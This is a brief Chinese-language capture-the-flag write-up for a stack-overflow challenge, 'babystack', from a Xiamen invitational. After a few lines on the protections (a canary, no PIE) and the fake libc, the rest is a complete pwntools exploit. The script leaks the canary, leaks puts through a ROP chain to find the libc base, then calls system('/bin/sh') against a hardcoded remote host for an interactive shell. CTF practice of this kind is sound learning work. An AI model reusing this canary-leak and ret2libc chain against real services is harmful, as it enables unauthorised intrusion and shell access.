pwn1

题目来源： 厦门邀请赛

 

栈溢出，开了canary，无PIE

和一般的栈溢出相比只是多了一步泄露canary而已

还有就是这题给的libc是假的，需要自己找到正确的libc

exp如下：

from pwn import *

#io = process('./babystack')
#io = gdb.debug('./babystack', 'b *0x400908')
io = remote('111.200.241.244', 54565)

elf = ELF('./babystack')
#libc = elf.libc
libc = ELF('./libc-2.23.so')

pop_rdi = 0x400a93
puts_got = 0x600FA8
puts_plt = 0x400690
main_addr = 0x400908

#context.log_level = 'debug'

io.recvuntil('>> ')
io.send('1')
sleep(0.2)
io.send(b'a' * 136 + b'b')
io.recvuntil('>> ')
io.send('2')
io.recvuntil('b')
canary = u64(io.recv(7).rjust(8, b'\x00'))
info('canary: ' + hex(canary))

io.recvuntil('>> ')
io.send('1')
sleep(0.2)
payload = b'a' * 136 + p64(canary) + p64(0) + p64(pop_rdi) + p64(puts_got) + p64(puts_plt) + p64(main_addr)
io.send(payload)
io.recvuntil('>> ')
io.send('3')
puts_addr = u64(io.recvuntil('\n', drop = True).ljust(8, b'\x00'))
info('puts_addr: ' + hex(puts_addr))
libc_base = puts_addr - libc.symbols['puts']
info('libc_base: ' + hex(libc_base))
system_addr = libc_base + libc.symbols['system']
info('system_addr: ' + hex(system_addr))
#binsh_addr = libc_base + next(libc.search(b'/bin/sh\x00'))
binsh_addr = libc_base + 0x18cd57
info('binsh_addr: ' + hex(binsh_addr))

io.recvuntil('>> ')
io.send('1')
sleep(0.2)
payload = b'a' * 136 + p64(canary) + p64(0) + p64(pop_rdi) + p64(binsh_addr) + p64(system_addr)
io.send(payload)
io.recvuntil('>> ')
io.send('3')

io.interactive()